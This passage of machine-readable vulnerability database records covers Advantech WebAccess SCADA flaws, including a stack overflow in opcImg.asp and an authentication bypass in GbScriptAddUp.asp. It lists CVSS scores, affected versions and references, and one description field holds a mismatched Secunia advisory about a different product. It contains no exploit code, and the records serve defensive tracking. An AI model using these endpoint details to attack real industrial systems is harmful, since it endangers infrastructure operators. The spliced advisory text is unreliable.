"sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-405" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess Vulnerable to arbitrary code execution", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001549" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "permissions and access control", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-405" } ], "trust": 0.6 } }
var-201810-0128
Vulnerability from variot
Advantech WebAccess 8.3.2 and below is vulnerable to a stack buffer overflow vulnerability. A remote authenticated attacker could potentially exploit this vulnerability by sending a crafted HTTP request to broadweb/system/opcImg.asp. Advantech WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0128", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.2" }, { "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.3.2" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2fe7ab1-39ab-11e9-8710-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21797" }, { "db": "JVNDB", "id": "JVNDB-2018-011103" }, { "db": "CNNVD", "id": "CNNVD-201810-1121" }, { "db": "NVD", "id": "CVE-2018-15704" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011103" } ] }, "cve": "CVE-2018-15704", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CVE-2018-15704", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-21797", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2fe7ab1-39ab-11e9-8710-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "VHN-125990", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2018-15704", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-15704", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2018-15704", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2018-21797", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201810-1121", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2fe7ab1-39ab-11e9-8710-000c29342cb1", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-125990", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2018-15704", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2fe7ab1-39ab-11e9-8710-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21797" }, { "db": "VULHUB", "id": "VHN-125990" }, { "db": "VULMON", "id": "CVE-2018-15704" }, { "db": "JVNDB", "id": "JVNDB-2018-011103" }, { "db": "CNNVD", "id": "CNNVD-201810-1121" }, { "db": "NVD", "id": "CVE-2018-15704" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess 8.3.2 and below is vulnerable to a stack buffer overflow vulnerability. A remote authenticated attacker could potentially exploit this vulnerability by sending a crafted HTTP request to broadweb/system/opcImg.asp. Advantech WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2018-15704" }, { "db": "JVNDB", "id": "JVNDB-2018-011103" }, { "db": "CNVD", "id": "CNVD-2018-21797" }, { "db": "IVD", "id": "e2fe7ab1-39ab-11e9-8710-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-125990" }, { "db": "VULMON", "id": "CVE-2018-15704" } ], "trust": 2.52 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-15704", "trust": 3.4 }, { "db": "TENABLE", "id": "TRA-2018-33", "trust": 2.6 }, { "db": "CNNVD", "id": "CNNVD-201810-1121", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-21797", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-011103", "trust": 0.8 }, { "db": "IVD", "id": "E2FE7AB1-39AB-11E9-8710-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-125990", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2018-15704", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2fe7ab1-39ab-11e9-8710-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21797" }, { "db": "VULHUB", "id": "VHN-125990" }, { "db": "VULMON", "id": "CVE-2018-15704" }, { "db": "JVNDB", "id": "JVNDB-2018-011103" }, { "db": "CNNVD", "id": "CNNVD-201810-1121" }, { "db": "NVD", "id": "CVE-2018-15704" } ] }, "id": "VAR-201810-0128", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "e2fe7ab1-39ab-11e9-8710-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21797" }, { "db": "VULHUB", "id": "VHN-125990" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2fe7ab1-39ab-11e9-8710-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21797" } ] }, "last_update_date": "2024-11-23T22:17:17.884000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess/webaccessscada" }, { "title": "Check Point Security Alerts: Advantech WebAccess Buffer Overflow (CVE-2018-15704)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=check_point_security_alerts\u0026qid=ead700aab13b40fd4fe05b6f6af7e21e" } ], "sources": [ { "db": "VULMON", "id": "CVE-2018-15704" }, { "db": "JVNDB", "id": "JVNDB-2018-011103" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-119", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-125990" }, { "db": "JVNDB", "id": "JVNDB-2018-011103" }, { "db": "NVD", "id": "CVE-2018-15704" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.6, "url": "https://www.tenable.com/security/research/tra-2018-33" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15704" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15704" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/787.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://advisories.checkpoint.com/defense/advisories/public/2024/cpai-2018-2677.html" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-21797" }, { "db": "VULHUB", "id": "VHN-125990" }, { "db": "VULMON", "id": "CVE-2018-15704" }, { "db": "JVNDB", "id": "JVNDB-2018-011103" }, { "db": "CNNVD", "id": "CNNVD-201810-1121" }, { "db": "NVD", "id": "CVE-2018-15704" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e2fe7ab1-39ab-11e9-8710-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21797" }, { "db": "VULHUB", "id": "VHN-125990" }, { "db": "VULMON", "id": "CVE-2018-15704" }, { "db": "JVNDB", "id": "JVNDB-2018-011103" }, { "db": "CNNVD", "id": "CNNVD-201810-1121" }, { "db": "NVD", "id": "CVE-2018-15704" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-10-26T00:00:00", "db": "IVD", "id": "e2fe7ab1-39ab-11e9-8710-000c29342cb1" }, { "date": "2018-10-25T00:00:00", "db": "CNVD", "id": "CNVD-2018-21797" }, { "date": "2018-10-22T00:00:00", "db": "VULHUB", "id": "VHN-125990" }, { "date": "2018-10-22T00:00:00", "db": "VULMON", "id": "CVE-2018-15704" }, { "date": "2019-01-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011103" }, { "date": "2018-10-23T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1121" }, { "date": "2018-10-22T19:29:00.453000", "db": "NVD", "id": "CVE-2018-15704" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-10-26T00:00:00", "db": "CNVD", "id": "CNVD-2018-21797" }, { "date": "2020-08-24T00:00:00", "db": "VULHUB", "id": "VHN-125990" }, { "date": "2020-08-24T00:00:00", "db": "VULMON", "id": "CVE-2018-15704" }, { "date": "2019-01-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011103" }, { "date": "2020-08-25T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1121" }, { "date": "2024-11-21T03:51:18.577000", "db": "NVD", "id": "CVE-2018-15704" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1121" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Buffer error vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011103" }, { "db": "CNNVD", "id": "CNNVD-201810-1121" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1121" } ], "trust": 0.6 } }
var-201202-0220
Vulnerability from variot
GbScriptAddUp.asp in Advantech/BroadWin WebAccess before 7.0 does not properly perform authentication, which allows remote attackers to execute arbitrary code via unspecified vectors. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0220", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "19cc98cc-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0669" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001558" }, { "db": "CNNVD", "id": "CNNVD-201202-416" }, { "db": "NVD", "id": "CVE-2012-0240" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001558" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2012-0240", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2012-0240", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2012-0240", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "19cc98cc-2354-11e6-abef-000c29c66e3d", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-53521", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-0240", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2012-0240", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201202-416", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "19cc98cc-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-53521", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "19cc98cc-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53521" }, { "db": "JVNDB", "id": "JVNDB-2012-001558" }, { "db": "CNNVD", "id": "CNNVD-201202-416" }, { "db": "NVD", "id": "CVE-2012-0240" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "GbScriptAddUp.asp in Advantech/BroadWin WebAccess before 7.0 does not properly perform authentication, which allows remote attackers to execute arbitrary code via unspecified vectors. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nThe vulnerability is reported in the following components:\n* 